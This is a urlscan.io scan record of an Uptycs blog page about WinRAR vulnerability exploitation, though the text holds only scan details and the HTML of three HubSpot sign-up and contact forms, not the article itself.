www.uptycs.com
Open in
urlscan Pro
199.60.103.30
Public Scan
URL:
https://www.uptycs.com/blog/winrar-vulnerability-exploitation
Submission: On April 16 via api from BY — Scanned from DE
Submission: On April 16 via api from BY — Scanned from DE
Form analysis 3 forms found in the DOM
POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e
<form id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/a84fa16e-d67b-4c28-b1c2-bce43902236e"
class="hs-form-private hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e hs-form-a84fa16e-d67b-4c28-b1c2-bce43902236e_6a163c41-1de7-4bcd-9125-7dbb5e2777e0 hs-form stacked hs-custom-form"
target="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-instance-id="6a163c41-1de7-4bcd-9125-7dbb5e2777e0" data-form-id="a84fa16e-d67b-4c28-b1c2-bce43902236e" data-portal-id="2617658"
data-test-id="hsForm_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" data-hs-cf-bound="true">
<fieldset class="form-columns-0">
<div class="hs-richtext hs-main-font-element">
<h1 style="font-size: 20px;">Sign up here:</h1>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your First name"
for="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Last name"
for="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Work Email" for="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-2">
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Phone number"
for="phone-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Company name"
for="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_my_security_priority_is_ hs-my_security_priority_is_ hs-fieldtype-select field hs-form-field" style="display: none;"><label id="label-my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your My security priority is:" for="my_security_priority_is_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>My security priority is:</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="my_security_priority_is_" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your How did you hear about us?" for="how_did_you_hear_about_uptycs_-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>How did you hear about us?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Job title"
for="jobtitle-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your Employees"
for="numberofemployees-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your LD BookIt Log ID"
for="ld_bookit_log_id-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>LD BookIt Log ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_source"
for="utm_source-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_source</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_medium"
for="utm_medium-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_medium</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_content"
for="utm_content-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_content</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" class="" placeholder="Enter your utm_campaign"
for="utm_campaign-a84fa16e-d67b-4c28-b1c2-bce43902236e_8032"><span>utm_campaign</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
</div>
</fieldset>
<fieldset class="form-columns-1">
<div class="legal-consent-container">
<div class="hs-richtext">
<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
</div>
</div>
</fieldset>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179640","formDefinitionUpdatedAt":"1699473876130","lang":"en","legalConsentOptions":"{\"legitimateInterestSubscriptionTypes\":[3136631],\"communicationConsentCheckboxes\":[{\"communicationTypeId\":3136631,\"label\":\"I agree to receive other communications from Uptycs.\",\"required\":false}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"communicationConsentText\":\"Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\",\"processingConsentCheckboxLabel\":\"I agree to allow Uptycs to store and process my personal data.\",\"privacyPolicyText\":\"<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\"https://www.uptycs.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a></u>.</p>\",\"isLegitimateInterest\":true}","embedType":"REGULAR","clonedFromForm":"d6de4afc-a64a-42eb-aa20-ab41fc2fe11c","notifyHubSpotOwner":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_772372348","formInstanceId":"8032","rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"339e825031d31583ab18f0bd876560f4","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","dateFields":"became_an_mql_date","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":2025.3000030517578,"rumTotalRenderTime":2163.300003051758,"rumServiceResponseTime":685.6000061035156,"rumFormRenderTime":138,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181308,"originalEmbedContext":{"portalId":"2617658","formId":"a84fa16e-d67b-4c28-b1c2-bce43902236e","region":"na1","target":"#hs_form_target_form_772372348","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"8032","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"Thanks for submitting the form.","isMobileResponsive":true,"rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"339e825031d31583ab18f0bd876560f4","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"6a163c41-1de7-4bcd-9125-7dbb5e2777e0","renderedFieldsIds":["firstname","lastname","email","phone","company","my_security_priority_is_","how_did_you_hear_about_uptycs_","company_hq___state","jobtitle","numberofemployees","became_an_mql_date","honeypot_queue","ld_bookit_log_id","utm_source","utm_medium","utm_content","utm_campaign"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298180175,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298180175,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298180176,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181302,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_a84fa16e-d67b-4c28-b1c2-bce43902236e_8032" style="display: none;"></iframe>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802
<form id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/0492e7b1-c029-4110-8042-598f482d9802"
class="hs-form-private hsForm_0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802 hs-form-0492e7b1-c029-4110-8042-598f482d9802_1297ca44-21d4-42ea-8deb-d6564e7b5c32 hs-form stacked hs-custom-form"
target="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" data-instance-id="1297ca44-21d4-42ea-8deb-d6564e7b5c32" data-form-id="0492e7b1-c029-4110-8042-598f482d9802" data-portal-id="2617658"
data-test-id="hsForm_0492e7b1-c029-4110-8042-598f482d9802_1944" data-hs-cf-bound="true">
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your Work Email" for="email-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-0492e7b1-c029-4110-8042-598f482d9802_1944" name="email" required="" placeholder="email@work.com" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-0492e7b1-c029-4110-8042-598f482d9802_1944"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Submit"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179620","formDefinitionUpdatedAt":"1689357225520","lang":"en","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_984600344","formInstanceId":"1944","rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"5e4fd5673911973f50e990e405439841","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":1991.3000030517578,"rumTotalRenderTime":2017.099998474121,"rumServiceResponseTime":651.6000061035156,"rumFormRenderTime":25.79999542236328,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181301,"originalEmbedContext":{"portalId":"2617658","formId":"0492e7b1-c029-4110-8042-598f482d9802","region":"na1","target":"#hs_form_target_form_984600344","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"1944","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"Thanks for submitting the form.","isMobileResponsive":true,"rawInlineMessage":"Thanks for submitting the form.","hsFormKey":"5e4fd5673911973f50e990e405439841","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"1297ca44-21d4-42ea-8deb-d6564e7b5c32","renderedFieldsIds":["email","honeypot_queue"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298180141,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298180141,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298180142,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181297,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_0492e7b1-c029-4110-8042-598f482d9802_1944" style="display: none;"></iframe>
</form>POST https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f
<form id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" method="POST" accept-charset="UTF-8" enctype="multipart/form-data" novalidate=""
action="https://forms.hsforms.com/submissions/v3/public/submit/formsnext/multipart/2617658/464171ef-7766-4b86-9e48-f51bb13b325f"
class="hs-form-private hsForm_464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f hs-form-464171ef-7766-4b86-9e48-f51bb13b325f_3b848806-0722-4949-a72e-4881906c88f1 hs-form stacked hs-custom-form"
target="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-instance-id="3b848806-0722-4949-a72e-4881906c88f1" data-form-id="464171ef-7766-4b86-9e48-f51bb13b325f" data-portal-id="2617658"
data-test-id="hsForm_464171ef-7766-4b86-9e48-f51bb13b325f_4495" data-hs-cf-bound="true">
<div>
<div class="hs-richtext hs-main-font-element">
<h2 style="font-size: 20px; text-align: center; padding-bottom: 9px;">Connect with a security expert</h2>
</div>
</div>
<div class="hs_firstname hs-firstname hs-fieldtype-text field hs-form-field"><label id="label-firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your First name"
for="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>First name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="firstname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="firstname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="given-name" value=""></div>
</div>
<div class="hs_lastname hs-lastname hs-fieldtype-text field hs-form-field"><label id="label-lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Last name"
for="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Last name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="lastname-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="lastname" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="family-name" value=""></div>
</div>
<div class="hs_email hs-email hs-fieldtype-text field hs-form-field"><label id="label-email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Work Email" for="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Work
Email</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="email-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="email" required="" placeholder="" type="email" class="hs-input" inputmode="email" autocomplete="email" value=""></div>
</div>
<div class="hs_phone hs-phone hs-fieldtype-phonenumber field hs-form-field" style="display: none;"><label id="label-phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Phone number"
for="phone-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Phone number</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="phone" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company hs-company hs-fieldtype-text field hs-form-field"><label id="label-company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Company name"
for="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company name</span><span class="hs-form-required">*</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input id="company-464171ef-7766-4b86-9e48-f51bb13b325f_4495" name="company" required="" placeholder="" type="text" class="hs-input" inputmode="text" autocomplete="organization" value=""></div>
</div>
<div class="hs_how_did_you_hear_about_uptycs_ hs-how_did_you_hear_about_uptycs_ hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your How did you hear about Uptycs?" for="how_did_you_hear_about_uptycs_-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>How did you hear about Uptycs?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="how_did_you_hear_about_uptycs_" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_company_hq___state hs-company_hq___state hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Company HQ - State" for="company_hq___state-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Company HQ - State</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="company_hq___state" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_jobtitle hs-jobtitle hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Job title"
for="jobtitle-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Job title</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="jobtitle" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_numberofemployees hs-numberofemployees hs-fieldtype-number field hs-form-field" style="display: none;"><label id="label-numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your Employees"
for="numberofemployees-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Employees</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="numberofemployees" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_became_an_mql_date hs-became_an_mql_date hs-fieldtype-date field hs-form-field" style="display: none;"><label id="label-became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class=""
placeholder="Enter your Became an MQL date" for="became_an_mql_date-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>Became an MQL date</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="became_an_mql_date" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs-dependent-field">
<div class="hs_honeypot_queue hs-honeypot_queue hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your What color is the sky?"
for="honeypot_queue-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>What color is the sky?</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="honeypot_queue" class="hs-input" type="hidden" value=""></div>
</div>
</div>
<div class="hs_ld_bookit_log_id hs-ld_bookit_log_id hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your LD BookIt Log ID"
for="ld_bookit_log_id-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>LD BookIt Log ID</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="ld_bookit_log_id" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_source hs-utm_source hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_source"
for="utm_source-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_source</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_source" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_medium hs-utm_medium hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_medium"
for="utm_medium-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_medium</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_medium" class="hs-input" type="hidden" value=""></div>
</div>
